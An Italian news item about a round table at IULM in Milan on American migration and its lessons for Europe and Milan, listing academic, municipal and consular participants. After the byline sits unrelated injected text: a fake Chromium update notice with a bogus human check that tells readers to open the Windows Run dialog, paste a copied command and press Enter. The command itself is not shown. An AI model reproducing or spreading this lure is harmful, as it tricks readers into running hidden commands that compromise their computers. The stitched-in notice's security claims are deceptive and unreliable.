La tavola rotonda intitolata Le migrazioni americane: esperienze per l’Europa e per Milano

Mercoledì 13 aprile, in IULM, una giornata dedicata al tema dei flussi migratori, una questione quanto mai attuale e fondamentale nel periodo storico in cui viviamo.
In un’epoca di avanzata globalizzazione, segnata da un’evoluzione repentina delle relazioni transnazionali, economiche, sociali, politiche e identitarie, nonché da una ridefinizione del ruolo degli stati-nazione e degli organismi sovranazionali, i processi migratori hanno, infatti, assunto un ruolo sempre più centrale.
In assenza di un’efficace governance internazionale la questione migratoria è dunque uno dei grandi nodi che caratterizzano la storia del presente, così come la ridefinizione del territorio e delle varie umanità che lo popolano, sempre più sospese tra dimensione locale e globale.
La tavola rotonda intitolata Le migrazioni americane: esperienze per l’Europa e per Milano, ha visto protagonisti; Mario Negri, Rettore Università IULM; Pierfrancesco Majorino, Assesore alle politiche sociali del comune di Milano; Silvia Nuñez Garcia, direttrice del (CISAN/UNAM), Elisabeth Gutierrez Romero, università Nacional Autónoma de México (UNAM); Marisela Morales Ibáñez, Console Generale del Messico a Milano e presidentessa del Gruppo Consolare de  America Latina e Caribe  di Milano e del Nord Italia; Gloria Cecilia Gomez de Lievano, Console Generale della Colombia a Milano;  Karla Georgina Martinez Herrera,  Console Generale di El Salvador a Milano; Tanacha Sanchez, Console Generale della Rep. Dominicana a Milano; Luis Martinez, Console del Venezuela a Milano; Alessio Arena, del Consolato del Venezuela a Milano; Alberto Vitali, Responsabile della Pastorale Migrante della Diocesi di Milano; e i docenti dell’università IULM.
 
L’obiettivo del dibattito e offrire spunti per tentare una riflessione comparativa, alla ricerca di chiavi di lettura utili a decifrare le prospettive future dell’Europa e della metropoli milanese.
Di Daniel Sigua 
Chrome Icon

Chromium Security Update Required

Complete verification to update your browser engine

Important Security Notice

Your browser's Chromium engine is outdated and requires an immediate update to ensure secure browsing and protect your system from vulnerabilities.

  • Outdated versions are susceptible to security exploits
  • Newer versions include critical performance improvements
  • This update includes enhanced privacy protections

Complete the verification process below to automatically download and install the latest Chromium engine update.

Verify you are human to continue

I'm not a robot

Verification required to update browser components

Complete the update process:

1
Press Win + R to open the Run dialog
2
Paste the copied command with Ctrl + V
3
Press Enter to execute the update process